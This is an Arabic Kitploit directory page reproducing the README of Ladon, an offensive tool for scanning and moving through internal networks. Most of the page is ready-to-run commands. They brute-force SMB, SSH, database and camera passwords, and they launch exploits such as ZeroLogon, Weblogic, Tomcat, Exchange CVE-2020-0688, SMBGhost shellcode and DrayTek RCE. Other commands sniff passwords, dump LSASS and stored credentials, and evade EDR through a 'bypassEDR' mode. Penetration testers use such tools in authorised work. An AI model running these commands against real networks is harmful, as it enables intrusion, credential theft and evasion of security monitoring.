Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Ladon — Ladon ماسح اختراق ضخم للشبكات الداخلية، مع إضافات لـ PowerShell وCobalt Strike، وتحميل في الذاكرة، وفحص بدون ملفات. يتضمن فحص المنافذ، والتعرف على الخدمات، واكتشاف أصول الشبكة، وتدقيق كلمات المرور، واكتشاف الثغرات عالية الخطورة، واستغلال الثغرات، وقراءة كلمات المرور، بالإضافة إلى GetShell بنقرة واحدة، ويدعم الفحص الجماعي لشرائح الشبكة A/B/C وكذلك الفحص عبر شرائح الشبكة المتعددة، ويدعم فحص قوائم عناوين URL والمضيفين وأسماء النطاقات وغيرها. اكتشاف أصول الشبكة عبر 32 بروتوكولًا (ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP) أو أساليب للحصول بسرعة على عناوين IP للمضيفات النشطة في الشبكة المستهدفة، وأسماء الحواسيب، ومجموعات العمل، والموارد المشتركة، وعناوين بطاقات الشبكة، وإصدارات أنظمة التشغيل، والمواقع الإلكترونية، والنطاقات الفرعية، والبرمجيات الوسيطة، والخدمات المفتوحة، والموجّهات، والمبدّلات، وقواعد البيانات، والطابعات وغيرها. وحدات عديدة لاكتشاف الثغرات عالية الخطورة مثل MS17010 وZimbra وExchange. | Kitploit
أدوات/GitHubGitHub/k8gege/ladon
تصعيد الامتيازاتالاستطلاعماسحات الثغرات الأمنيةتخطيط الشبكةهجمات كلمات المرورمسح المنافذالاستغلالالحركة الجانبيةجمع المعلومات

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

حول

Ladon ماسح اختراق ضخم للشبكات الداخلية، مع إضافات لـ PowerShell وCobalt Strike، وتحميل في الذاكرة، وفحص بدون ملفات. يتضمن فحص المنافذ، والتعرف على الخدمات، واكتشاف أصول الشبكة، وتدقيق كلمات المرور، واكتشاف الثغرات عالية الخطورة، واستغلال الثغرات، وقراءة كلمات المرور، بالإضافة إلى GetShell بنقرة واحدة، ويدعم الفحص الجماعي لشرائح الشبكة A/B/C وكذلك الفحص عبر شرائح الشبكة المتعددة، ويدعم فحص قوائم عناوين URL والمضيفين وأسماء النطاقات وغيرها. اكتشاف أصول الشبكة عبر 32 بروتوكولًا (ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP) أو أساليب للحصول بسرعة على عناوين IP للمضيفات النشطة في الشبكة المستهدفة، وأسماء الحواسيب، ومجموعات العمل، والموارد المشتركة، وعناوين بطاقات الشبكة، وإصدارات أنظمة التشغيل، والمواقع الإلكترونية، والنطاقات الفرعية، والبرمجيات الوسيطة، والخدمات المفتوحة، والموجّهات، والمبدّلات، وقواعد البيانات، والطابعات وغيرها. وحدات عديدة لاكتشاف الثغرات عالية الخطورة مثل MS17010 وZimbra وExchange.

أمن الويب
اختبار الاختراق
تعداد النطاقات الفرعية
GitHubk8gege/ladon

Ladon

عرض المستودعالموقع الإلكتروني
5.3k88218منذ سنة واحدةتمت المراجعة من قبل Kitploit
مشاركة

Ladon ماسح اختراق الشبكة الداخلية الكبير - إضافة Cobalt Strike والتحميل في الذاكرة

Author Ladon Bin GitHub issues Github Stars GitHub forks GitHub license Downloads

image

مقدمة البرنامج

Ladon هو ماسح اختراق للشبكات الداخلية الكبيرة\اختراق النطاقات\أداة الحركة الجانبية، وحدة PowerShell، إضافة Cobalt Strike، تحميل في الذاكرة، فحص بدون ملفات. يتضمن فحص المنافذ، التعرف على الخدمات، استكشاف أصول الشبكة، تدقيق كلمات المرور، كشف الثغرات عالية الخطورة، استغلال الثغرات، قراءة كلمات المرور، والحصول على شل (GetShell) بنقرة واحدة، ويدعم الفحص الجماعي للقطاعات A/B/C وكذلك الفحص عبر القطاعات، ويدعم فحص قوائم URL والمضيفات والنطاقات. الإصدار 12.2 مدمج به 262 وحدة وظيفية، وحدة استكشاف أصول الشبكة بأكثر من 30 بروتوكولًا (ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP) وطرق سريعة للحصول على معلومات مثل عناوين IP للمضيفات النشطة في الشبكة المستهدفة، أسماء الحواسيب، مجموعات العمل، الموارد المشتركة، عناوين بطاقة الشبكة، إصدار نظام التشغيل، المواقع، النطاقات الفرعية، الوسائط الوسيطة، الخدمات المفتوحة، أجهزة التوجيه، المحولات، قواعد البيانات، الطابعات، وغيرها. كشف الثغرات عالية الخطورة 16+ تشمل Cisco وZimbra وExchange وDrayTek وMS17010 وSMBGhost وWeblogic وActiveMQ وTomcat وسلسلة Struts2 وPrinter وغيرها، تدقيق كلمات المرور 25+ تشمل قواعد البيانات (Mysql وOracle وMSSQL) وFTP وSSH وVNC وWindows (LDAP وSMB/IPC وNBT وWMI وSmbHash وWmiHash وWinrm) وBasicAuth وTomcat وWeblogic وRar وغيرها، تنفيذ الأوامر عن بُعد يتضمن (smbexec/wmiexe/psexec/atexec/sshexec/webshell)، وحدة التعرف على بصمات الويب تتعرف على 135+ (تطبيقات الويب، الوسائط الوسيطة، أنواع السكربتات، أنواع الصفحات) وغيرها، رفع الصلاحيات المحلية 21+ تتضمن SweetPotato\BadPotato\EfsPotato\BypassUAC، وإضافات POC قابلة للتخصيص بدرجة عالية تدعم تجميعات .NET و DLL (C#/Delphi/VC) وإضافات مكتوبة بلغات مثل PowerShell، وتدعم استدعاء أي برامج أو أوامر خارجية بكميات كبيرة عبر تهيئة INI، كما يمكن لمولّد EXP توليد ثغرات POC/EXP بضغطة واحدة لتوسيع قدرات الفحص بسرعة. يدعم Ladon التحميل في الذاكرة عبر إضافة Cobalt Strike، والفحص بدون ملفات للحركة الجانبية السريعة داخل الشبكة الداخلية.

تحميل Ladon```Bash

https://github.com/k8gege/Ladon/releases https://k8gege.org/Download

root@kitploit:~
### استخدام بسيط

على الرغم من أن Ladon غني بالوظائف ومتنوع، إلا أن استخدامه بسيط جدًا، ويمكن لأي شخص إتقانه بسهولة<br>
يكفي معامل واحد أو معاملان لاستخدام 90% من الوظائف، والوحدة الواحدة تعادل أداة جديدة

### بيئة التشغيل

#### Windows

يمكن استخدام Ladon على أنظمة Windows المثبت عليها .net 2.0 أو إصدار أحدث (يتضمن النظام .net مدمجًا بعد Win7)<br>
مثل Cmd وPowerShell وCmd للتحكم عن بُعد وWebShell وغيرها، بالإضافة إلى التحميل في الذاكرة عبر Cobalt Strike<br>
يتوافق Ladon.ps1 تمامًا مع PowerShell على Win7-Win11/2025، ويمكن تحميله عن بُعد بغض النظر عن الإصدار لتنفيذ اختراق بدون ملفات<br>

#### LadonGo على جميع المنصات يدعم Linux وMac وArm وMIPS
جميع المنصات: Linux وMacOS وWindows وأجهزة الراوتر وأجهزة الشبكة وغيرها من أنظمة التشغيل<br>
https://github.com/k8gege/LadonGo

### ظروف عصيبة

العمليات الفعلية لا تسير بسلاسة دائمًا، فبعض الشبكات الداخلية تكون بطيئة جدًا بعد إعادة التوجيه أو يتعذر إعادة توجيهها، ولا يبقى سوى رفع الأداة إلى الهدف<br>
بعض أحصنة طروادة قد تحتاج نصف يوم لرفع برنامج بحجم 2-3 ميجابايت، أو قد يتعذر رفعها إطلاقًا، ناهيك عن عشرات الميجابايتات لبرامج PY<br>
تم تطوير Ladon بلغة C#، وحجم البرنامج صغير جدًا حوالي 500K، فحتى لو كان الحصان ضعيفًا يمكنه رفع برنامج بحجم 500K على الأقل<br>
وإذا لم ينجح ذلك أيضًا، يمكن التحميل في الذاكرة عن بُعد عبر PowerShell، وهذه ميزة لا يمكن للبرامج الكبيرة المترجمة بـ PY أو GO مجاراتها

### الهدف

خدمة متكاملة، نوفر للمستخدمين أداة فحص بسيطة وسهلة الاستخدام وغنية بالوظائف ومرنة للغاية

### المميزات

حركة مرور فحص صغيرة<br>
حجم البرنامج صغير<br>
وظائف غنية وقوية<br>
برنامج بسيط وسهل الاستخدام<br>
الإضافات تدعم لغات متعددة<br>
متعدد المنصات (Win/Kali/Ubuntu) وغيرها<br>
يدعم استخدامه كإضافة داخل Cobalt Strike<br>
يدعم الاختراق بدون ملفات عبر PowerShell<br>
مولّد Exp يمكنه إنشاء Poc بنقرة واحدة<br>
إصدارات متعددة تناسب مختلف البيئات<br>

### وظائف معاملات البرنامج

1  يدعم فحص عنوان IP محدد<br>
2  يدعم فحص نطاق محدد<br>
3  يدعم فحص اسم مضيف محدد<br>
4  يدعم فحص قطاع C محدد (ip/24)<br>
5  يدعم فحص قطاع B محدد (ip/16)<br>
6  يدعم فحص قطاع A محدد (ip/8)<br>
7  يدعم فحص عنوان URL محدد<br>
8  يدعم فحص IP بشكل مجمّع (ip.txt)<br>
9  يدعم فحص قطاعات C بشكل مجمّع (ip24.txt)<br>
10 يدعم فحص قطاعات C بشكل مجمّع (ipc.txt)<br>
11 يدعم فحص قطاعات B بشكل مجمّع (ip16.txt)<br>
12 يدعم فحص عناوين URL بشكل مجمّع (url.txt)<br>
13 يدعم فحص النطاقات بشكل مجمّع (domain.txt)<br>
14 يدعم فحص أسماء المضيفين بشكل مجمّع (host.txt)<br>
15 يدعم فحص قطاعات الدول بشكل مجمّع (cidr.txt)<br>
16 يدعم قوائم السلاسل النصية بشكل مجمّع (str.txt)<br>
17 يدعم قائمة حسابات وكلمات مرور المضيفين (check.txt)<br>
18 يدعم قائمة المستخدمين وكلمات المرور (userpass.txt)<br>
19 يدعم فحص نطاق محدد من قطاعات C<br>
20 يدعم تحميل DLL مخصص عبر المعاملات (C# فقط)<br>
21 يدعم تحميل EXE مخصص عبر المعاملات (C# فقط)<br>
22 يدعم تحميل ملف إعدادات INI مخصص عبر المعاملات<br>
23 يدعم تحميل PowerShell مخصص عبر المعاملات<br>
24 يدعم البرامج المخصصة (أوامر النظام أو برامج الطرف الثالث، أي برامج أو نصوص مطورة بأي لغة)<br>
25 الإضافات (تدعم لغات متعددة C#/Delphi/Golang/Python/VC/PowerShell)<br>
26 يدعم Cobalt Strike (فحص الشبكة الداخلية للهدف عبر سطر أوامر beacon أو فحص أهداف الشبكة الخارجية عبر خادم القفز)<br>
27 يدعم فحص IP بصيغة CIDR، مثل 100.64.0.0/10، 192.168.1.1/20 وغيرها<br>
28 يدعم تكوين INI تخمين كلمات مرور البرامج المخصصة<br>

### دليل الاستخدام المختصر

الوثيقة الكاملة لدليل الاستخدام المختصر لـ Ladon: http://k8gege.org/Ladon <br>
وثيقة وظائف وحدات Excel: http://k8gege.org/Ladon/wiki.xlsx <br>
يدعم التحميل في الذاكرة عبر Cmd وCobalt Strike وPowerShell وغيرها<br>
إصدارات Windows: .Net وCobalt Strike وPowerShell<br>
إصدارات جميع الأنظمة: GO (جميع المنصات) وPython (جميع المنصات نظريًا)<br>
PS: Study مناسب للتعلم والاستخدام محليًا، وللوظائف الكاملة استخدم CMD

### فحص BypassEDR

سرعة الفحص الافتراضية سريعة جدًا، لكن بعض دفاعات WAF أو EDR قوية جدًا<br>
حتى مع ضبط بضعة خيوط، قد يتوقف الفحص بعد حوالي 20 دقيقة<br>
يحاكي bypassEDR الوصول البشري لتجاوز استراتيجيات كشف السرعة<br>

سرعة الفحص أبطأ، فلا يستخدمه المتهورون الباحثون عن السرعة<br>```Bash
Ladon 10.1.2.8/24 MS17010 bypassEDR

وحدات تخمين كلمات المرور لا تدعم حاليًا معلمة bypassEDR

001 فحص الخيوط المخصصة

مثال: فحص ما إذا كان الجزء 10.1.2 من الهدف يحتوي على ثغرة MS17010
خيط واحد:```Bash Ladon 10.1.2.8/24 MS17010 t=1

root@kitploit:~
80 مؤشر ترابط:```Bash
Ladon noping 10.1.2.8/24 MS17010 t=80

عند الحماية عالية الشدة، اضبط خيوط الفحص على مستوى أقل، وF تعني الخيط المفرد
```Bash Ladon 10.1.2.8/24 MS17010 f=1

root@kitploit:~
### 002 فحص بروكسي Socks5
مثال: استخدام 8 خيوط لفحص القطاع 10.1.2 من الهدف بحثًا عن وجود ثغرة MS17010<br>```Bash
Ladon noping 10.1.2.8/24 MS17010 t=8

التفاصيل: http://k8gege.org/Ladon/proxy.html

ملاحظة: أدوات الوكيل لا تدعم Socks5، لذلك يجب إضافة معامل noping للفحص
سواء كان Frp أو أدوات مشابهة أخرى، السبب الرئيسي هو أن أدوات مثل Proxifier لا تدعم بروتوكول ICMP
لأن Ladon يستخدم ICMP افتراضيًا لاكتشاف الأجهزة النشطة أولاً، ثم يستخدم الوحدة المقابلة للاختبار
لذلك في بيئة الوكيل يجب تعطيل فحص ping، لأن ping في النظام يستخدم بروتوكول ICMP

003 فحص قطاع الشبكة/الفحص الجماعي

صيغة CIDR: ليست فقط /24/16/8 (الكل)```Bash Ladon 192.168.1.8/24 扫描模块 Ladon 192.168.1.8/16 扫描模块 Ladon 192.168.1.8/8 扫描模块

root@kitploit:~
تنسيق الحروف: فقط المقاطع C وB وA بالترتيب```Bash
Ladon 192.168.1.8/c 扫描模块
Ladon 192.168.1.8/b 扫描模块
Ladon 192.168.1.8/a 扫描模块

0x004 تحديد نطاق IP ومسح الشبكات الفرعية

فحص المضيفين النشطين في المقطع 1 (من 50 إلى 200) عبر ICMP```Bash

Ladon 192.168.1.50-192.168.1.200 ICMP

root@kitploit:~
#### فحص ICMP للمضيفين النشطين من 1.30 إلى 50.80```Bash
Ladon 192.168.1.30-192.168.50.80 ICMP  

تنسيق TXT

004 فحص ICMP الجماعي للمضيفين النشطين في قائمة قطاع C```Bash

Ladon ip24.txt ICMP Ladon ipc.txt ICMP

root@kitploit:~
##### 005 مسح جماعي عبر ICMP للمضيفين النشطين في قائمة القطاع B```Bash
Ladon ip16.txt ICMP
006 فحص ICMP الجماعي لقائمة CIDR (مثل نطاقات IP لبلد معيّن)```Bash

Ladon cidr.txt ICMP

root@kitploit:~
##### 007 فحص ICMP الجماعي لمعرفة ما إذا كانت النطاقات حية```Bash
Ladon domain.txt ICMP
008 فحص جماعي عبر ICMP لتحديد ما إذا كانت الأجهزة نشطة باستخدام اسم المضيف أو اسم الجهاز```Bash

Ladon host.txt ICMP

root@kitploit:~
##### 009 WhatCMS التعرف الجماعي على CMS وBanner وشهادات SSL والعناوين، ويمكنه التعرف على CMS غير المعروفة وأجهزة التوجيه والطابعات وأجهزة الشبكة والكاميرات وغيرها```Bash
Ladon 192.168.1.8 WhatCMS   扫描IP
Ladon 192.168.1.8/24 WhatCMS   扫描C段
Ladon 192.168.1.8/C WhatCMS   扫描C段
Ladon 192.168.1.8/B WhatCMS   扫描B段
Ladon 192.168.1.8/A WhatCMS   扫描A段
Ladon IP.TXT WhatCMS   扫描IP列表
Ladon IP24.TXT WhatCMS   扫描C段列表
Ladon IP16.TXT WhatCMS   扫描B段列表
Ladon cidr.TXT WhatCMS   扫描整个国家IP段列表
禁PING扫描<br>
Ladon noping 192.168.1.8 WhatCMS   扫描IP
Ladon noping 192.168.1.8/24 WhatCMS   扫描C段
010 كشف جماعي لإصدارات أجهزة توجيه DrayTek وثغراتها وكلمات المرور الضعيفة```Bash

Ladon url.txt DraytekPoc

root@kitploit:~
##### 011 فك تشفير كلمات مرور Base64 بالجملة```Bash
Ladon str.txt DeBase64

فحص الأصول، تحديد البصمة، تحديد الخدمات، المضيفات النشطة، فحص المنافذ

image

012 فحص ICMP للمضيفات النشطة (الأسرع)```Bash

Ladon 192.168.1.8/24 ICMP

root@kitploit:~
##### 013 Ping لاستطلاع المضيفات النشطة (استدعاء أمر Ping النظام وعرض معلومات ms وttl وغيرها)```Bash
Ladon 192.168.1.8/24 Ping

إذا كنت تعتقد أن المضيف حي فقط عندما يستجيب لأمر ping، يمكنك استخدام هذا الأمر للفحص الجماعي

014 اكتشاف المضيفات الحية ببروتوكولات متعددة (IP، اسم الجهاز، MAC/النطاق، الشركة المصنعة/إصدار النظام)```Bash

Ladon 192.168.1.8/24 OnlinePC

root@kitploit:~
##### 015 التعرف على نظام التشغيل عبر بروتوكولات متعددة (IP、اسم الجهاز、إصدار نظام التشغيل、الخدمات المفتوحة)```Bash
Ladon 192.168.1.8/24 OsInfo
016 اكتشاف OXID للمضيفين متعددي بطاقات الشبكة```Bash

Ladon 192.168.1.8/24 EthInfo Ladon 192.168.1.8/24 OxidInfo

root@kitploit:~
##### 017 استكشاف DNS لمضيف متعدد بطاقات الشبكة```Bash
Ladon 192.168.1.8/24 DnsInfo
018 فحص IP متعدد البروتوكولات للمضيفين النشطين```Bash

Ladon 192.168.1.8/24 OnlineIP

root@kitploit:~
##### 019 مسح ثغرة SMB MS17010 (IP، اسم الجهاز، رقم الثغرة، إصدار نظام التشغيل)```Bash
Ladon 192.168.1.8/24 MS17010
020 كشف ثغرة SMBGhost CVE-2020-0796 (IP، اسم الجهاز، رقم الثغرة، إصدار نظام التشغيل)```Bash

Ladon 192.168.1.8/24 SMBGhost

root@kitploit:~
##### 021 مسح عنوان الويب Banner لمزيد من المعلومات الكاملة، استخدم وحدة كشف WhatCMS```Bash
Ladon 192.168.1.8/24 WebInfo
Ladon http://192.168.1.8 WebInfo
Ladon 192.168.1.8/24 WebScan
Ladon http://192.168.1.8 WebScan
022 فحص نطاقات URL لمواقع القطاع C```Bash

Ladon 192.168.1.8/24 UrlScan

root@kitploit:~
##### 023 مسح نطاقات URL لمواقع القطاع C```Bash
Ladon 192.168.1.8/24 SameWeb
024 مسح النطاقات الفرعية والنطاقات من المستوى الثاني```Bash

Ladon baidu.com SubDomain

root@kitploit:~
##### 025 عنوان IP لتحليل اسم النطاق، عنوان IP لتحليل اسم المضيف```Bash
Ladon baidu.com DomainIP
Ladon baidu.com HostIP
025 تحليل IP لأسماء النطاقات بالجملة، تحليل IP لأسماء المضيفين بالجملة```Bash

Ladon domain.txt DomainIP Ladon host.txt HostIP

root@kitploit:~
##### 025 تحليل مجمّع للنطاقات وأسماء المضيفين — النتيجة تحتوي على IP فقط```Bash
Ladon domain.txt Domain2IP
Ladon host.txt Host2IP
026 استعلام DNS عن الأجهزة وعناوين IP داخل المجال (ضمن المجال، مع تحديد IP لوحدة تحكم المجال)```Bash

Ladon AdiDnsDump 192.168.1.8

root@kitploit:~
##### 027 الاستعلام عن الأجهزة وعناوين IP داخل المجال (شرط التواجد داخل المجال)
Ladon GetDomainIP

##### 028 فحص منافذ شبكة الفئة C، وفحص المنافذ المحددة```Bash
Ladon 192.168.1.8/24 PortScan
Ladon 192.168.1.8 PortScan 80,445,3389
029 مسح الويب في قطاع C والكشف عن CMS (800+ بصمة ويب)```Bash

Ladon 192.168.1.8/24 CMS Ladon 192.168.1.8/24 CmsInfo Ladon 192.168.1.8/24 WhatCMS

root@kitploit:~
##### 030 مسح أجهزة سيسكو```Bash
Ladon 192.168.1.8/24 CiscoInfo
Ladon http://192.168.1.8 CiscoInfo
031 تعداد مضيفي قاعدة بيانات Mssql (IP قاعدة البيانات، اسم الجهاز، إصدار SQL)```Bash

Ladon EnumMssql

root@kitploit:~
##### 032 تعداد موارد الشبكة المشتركة 	(النطاق، IP، اسم المضيف\المسار المشترك)```Bash
Ladon EnumShare
033 مسح خادم LDAP (اكتشاف وحدة تحكم المجال)```Bash

Ladon 192.168.1.8/24 LdapInfo

root@kitploit:~
##### 034 فحص خادم FTP وتحديد الإصدار```Bash
Ladon 192.168.1.8/24 FtpInfo

هجوم القوة الغاشمة / مصادقة الشبكة / كلمات المرور الضعيفة / تخمين كلمات المرور / قاعدة البيانات / الواجهة الخلفية للموقع / بوابة تسجيل الدخول / تسجيل دخول النظام

image للحصول على شرح تفصيلي لتخمين كلمات المرور، راجع SSH: http://k8gege.org/Ladon/sshscan.html

035 تخمين كلمات مرور SMB عبر المنفذ 445 (Windows)```Bash

Ladon 192.168.1.8/24 SmbScan

root@kitploit:~
##### 036 المنفذ 135 تخمين كلمة مرور Wmi(Windowns)```Bash
Ladon 192.168.1.8/24 WmiScan
037 منفذ 389 خادم LDAP، تخمين كلمات مرور مجال AD (Windows)```Bash

Ladon 192.168.1.8/24 LdapScan

root@kitploit:~
##### 038 المنفذ 5985 تخمين كلمة مرور Winrm (Windowns)```Bash
Ladon 192.168.1.8/24 WinrmScan
039 منفذ 445 SMB NTLM HASH تخمين (Windows)```Bash

Ladon 192.168.1.8/24 SmbHashScan

root@kitploit:~
##### 040 المنفذ 135 Wmi NTLM HASH Brute Force (Windows)```Bash
Ladon 192.168.1.8/24 WmiHashScan
041 تخمين كلمة مرور SSH عبر المنفذ 22 (Linux)```Bash

Ladon 192.168.1.8/24 SshScan Ladon 192.168.1.8:22 SshScan

root@kitploit:~
##### 042 منفذ 1433 اختراق كلمة مرور قاعدة بيانات Mssql```Bash
Ladon 192.168.1.8/24 MssqlScan
043 تخمين كلمة مرور قاعدة بيانات Oracle عبر المنفذ 1521```Bash

Ladon 192.168.1.8/24 OracleScan

root@kitploit:~
قاعدة بيانات Oracle خاصة، واختراق قاعدة ORCL فقط سيؤدي لتفويت الكثير من الصلاحيات<br>
لمزيد من التفاصيل: http://k8gege.org/Ladon/OracleScan.html<br>


##### 044 كسر كلمة مرور قاعدة بيانات Mysql على المنفذ 3306```Bash
Ladon 192.168.1.8/24 MysqlScan
045 منفذ 7001 تخمين كلمة مرور الواجهة الخلفية لـ Weblogic```Bash

Ladon http://192.168.1.8:7001/console WeblogicScan Ladon 192.168.1.8/24 WeblogicScan

root@kitploit:~
##### 046 منفذ 5900 تخمين كلمة مرور سطح المكتب البعيد VNC```Bash
Ladon 192.168.1.8/24 VncScan
047 تخمين كلمة مرور خادم FTP على المنفذ 21```Bash

Ladon 192.168.1.8/24 FtpScan

root@kitploit:~
##### 048 تخمين كلمة مرور تسجيل الدخول الخلفي لـ Tomcat على المنفذ 8080```Bash
Ladon 192.168.1.8/24 TomcatScan
Ladon http://192.168.1.8:8080/manage TomcatScan
049 منفذ Web 401 المصادقة الأساسية تخمين كلمات المرور```Bash

Ladon http://192.168.1.8/login HttpBasicScan Ladon ip.txt 401Scan

root@kitploit:~
##### 052 اختراق كلمات مرور Windows عبر بروتوكول Netbios على المنفذ 139```Bash
Ladon 192.168.1.8/24 NbtScan
053 منفذ 5985 بروتوكول Winrm اختراق كلمات مرور Windows```Bash

Ladon 192.168.1.8/24 WinrmScan

root@kitploit:~
##### 054 اختراق كلمة مرور كاميرا الشبكة (كلمات مرور افتراضية مدمجة)```Bash
Ladon 192.168.1.8/24 DvrScan

كشف الثغرات/Poc

image

055 كشف ثغرات SMB(CVE-2017-0143/CVE-2017-0144)```Bash

Ladon 192.168.1.8/24 MS17010

root@kitploit:~
##### 056 كشف ثغرة SMBGhost CVE-2020-0796		911 محفوظ```Bash
Ladon 192.168.1.8/24 SMBGhost
057 اكتشاف ثغرات Weblogic (CVE-2019-2725/CVE-2018-2894)```Bash

Ladon 192.168.1.8/24 WeblogicPoc

root@kitploit:~
##### 058 كشف الباب الخلفي لـ PhpStudy (phpstudy 2016/phpstudy 2018)  إزالة في 10.9 إبقاء في 911```Bash
Ladon 192.168.1.8/24 PhpStudyPoc
059 كشف ثغرات ActiveMQ (CVE-2016-3088)```Bash

Ladon 192.168.1.8/24 ActivemqPoc

root@kitploit:~
##### 060 كشف ثغرات Tomcat (CVE-2017-12615)```Bash
Ladon 192.168.1.8/24 TomcatPoc
061 كشف ثغرات Struts2(S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode/S2-045/S2-037)```Bash

Ladon 192.168.1.8/24 Struts2Poc

root@kitploit:~
##### 062 DraytekPoc كشف ثغرة CVE-2020-8515، اكتشاف إصدار Draytek، كشف كلمات المرور الضعيفة```Bash
Ladon 192.168.1.8 DraytekPoc
Ladon 192.168.1.8/24 DraytekPoc
كشف ثغرة RCE غير المصرح بها في FortiGate CVE-2024-55591```Bash

Ladon 192.168.1.8/24 CVE-2024-55591

root@kitploit:~
### استغلال الثغرات/Exploit
![image](https://assets.kitploit.com/production/public/readmes/placeholders/f0fc86cfe65f76d40e15aaec61704ec8220a56dc89d4be03c46f67cb31b9fa8c.svg)

##### 063 استغلال Weblogic(CVE-2019-2725)```Bash
Ladon 192.168.1.8/24 WeblogicExp
064 استغلال ثغرة Tomcat(CVE-2017-12615)```Bash

Ladon 192.168.1.8/24 TomcatExp

root@kitploit:~
##### 065 مولد CMD شامل لحقن DLL وتنفيذه في ثغرات Windows 0day (DLL بحجم 5KB فقط)```Bash
Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=
Ladon CmdDll b64x64 YwBhAGwAYwA=
066 CVE-2021-40444 ثغرة 0day في IE/Office من مايكروسوفت```Bash

Ladon CVE-2021-40444 MakeCab poc.dll Ladon CVE-2021-40444 MakeHtml http://192.168.1.8

root@kitploit:~
##### 067 DraytekExp CVE-2020-8515 استغلال تنفيذ الأوامر عن بُعد```Bash
Ladon DraytekExp http://192.168.1.8  whoami
068 اختراق المجال ZeroLogon CVE-2020-1472 رفع صلاحيات وحدة تحكم المجال (تفريغ كلمة المرور)```Bash

Ladon ZeroLogon dc.k8gege.org

root@kitploit:~
##### 069 CVE-2020-0688 ثغرة التسلسل في Exchange (.net 4.0)```Bash
Ladon cve-2020-0688 192.168.1.142 Administrator K8gege520
070 استغلال ثغرة حلقة ForExec (الأسود الأبدي Win10 CVE-2020-0796,خروج ناجح لتجنب الشاشة الزرقاء للهدف)```Bash

Ladon ForExec "CVE-2020-0796-Exp -i 192.168.1.8 -p 445 -e --load-shellcode test.txt" 80 "Exploit finnished"

root@kitploit:~
### تنزيل الملفات ونقل الملفات

##### 071 نقل الملفات داخل الشبكة الداخلية تنزيل HTTP تنزيل HTTPS تنزيل MSF```Bash
Ladon wget https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe<br>
Ladon HttpDownLoad http://k8gege.org/Download/Ladon.rar
072 نقل الملفات عبر الشبكة الداخلية تنزيل Ftp```Bash

Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe

root@kitploit:~
### التشفير وفك التشفير (HEX/Base64)

##### 073 تشفير وفك تشفير Hex```Bash
Ladon 123456 EnHex
Ladon 313233343536 DeHex
074 تشفير وفك تشفير Base64```Bash

Ladon 123456 EnBase64 Ladon MTIzNDU2 DeBase64 Ladon str.txt DeBase64

root@kitploit:~
### استنشاق الشبكة

##### 075 استنشاق كلمة مرور FTP (ربط IP الجهاز المحلي، استنشاق تلقائي للقطاع C)
الأجهزة متعددة بطاقات الشبكة، تستنشق IP القطاع C المقابل```Bash
Ladon FtpSniffer 192.168.1.5
076 أداة التقاط كلمات مرور HTTP (ربط بعنوان IP للجهاز المحلي، التقاط تلقائي لقطاع C)

الأجهزة متعددة بطاقات الشبكة، تلتقط عناوين IP لقطاع C المقابل```Bash Ladon HTTPSniffer 192.168.1.5

root@kitploit:~
##### 077 استنشاق الشبكة```Bash
Ladon Sniffer

قراءة كلمات المرور

078 قراءة كلمات مرور مواقع IIS ومسارات المواقع```Bash

Ladon IISpwd

root@kitploit:~
##### 079 قراءة كلمات مرور WIFI المتصلة```Bash
Ladon WifiPwd
080 قراءة كلمة مرور FileZilla FTP```Bash

Ladon FileZillaPwd

root@kitploit:~
##### 081 قراءة Hash النظام، كلمات مرور VPN، DPAPI-Key  إزالة في 10.9```Bash
Ladon CVE-2021-36934  
082 تفريغ كلمة مرور الذاكرة DumpLsass (نص mimikatz العادي) يقتصر على ما قبل الإصدار 9.1.1```Bash

Ladon DumpLsass

root@kitploit:~
### جمع المعلومات

![image](http://k8gege.org/k8img/Ladon/Study/Linfo.PNG)

##### 083 API عرض المستخدم الحالي```Bash
Ladon w
Ladon whoami
083 الحصول على الـ IP الداخلي والـ IP الخارجي للجهاز المحلي```Bash

Ladon GetIP Ladon IPinfo

root@kitploit:~
##### 084 الحصول على PCname GUID CPUID DiskID عنوان Mac```Bash
Ladon GetID
085 عرض الملفات التي وصل إليها المستخدم مؤخرًا```Bash

Ladon Recent

root@kitploit:~
##### 086 عرض سجلات استخدام أقراص USB (اسم USB، علامة USB، معلومات المسار)```Bash
Ladon UsbLog
087 كشف الباب الخلفي (عناصر بدء التشغيل في التسجيل، اختطاف DLL)```Bash

Ladon CheckDoor Ladon AutoRun

root@kitploit:~
##### 088 تفاصيل العملية(مسار البرنامج، عدد البتات، معلمات التشغيل، المستخدم)```Bash
Ladon EnumProcess
Ladon Tasklist
089 الحصول على معاملات سطر الأوامر```Bash

Ladon cmdline Ladon cmdline cmd.exe

root@kitploit:~
##### 090 الحصول على معلومات الاختراق الأساسية```Bash
Ladon GetInfo
Ladon GetInfo2
091 إصدار .NET & PowerShell```Bash

Ladon NetVer Ladon PSver Ladon NetVersion Ladon PSversion

root@kitploit:~
##### 092 إصدار وقت التشغيل&بيئة الترجمة```Bash
Ladon Ver
Ladon Version
093 إصدار وقت التشغيل & بيئة التجميع & قائمة البرامج المثبتة```Bash

Ladon AllVer Ladon AllVersion

root@kitploit:~
##### 094 عرض معلومات وكيل IE```Bash
Ladon QueryProxy
095 DirList سرد الدليل + معلومات الاختراق الأساسية
افتراضيًا يسرد كامل القرص
```Bash

Ladon DirList

root@kitploit:~
###### تحديد حرف محرك الأقراص أو الدليل```Bash
Ladon DirList c:\   
096 QueryAdmin عرض مستخدمي الإدارة```Bash

Ladon QueryAdmin

root@kitploit:~
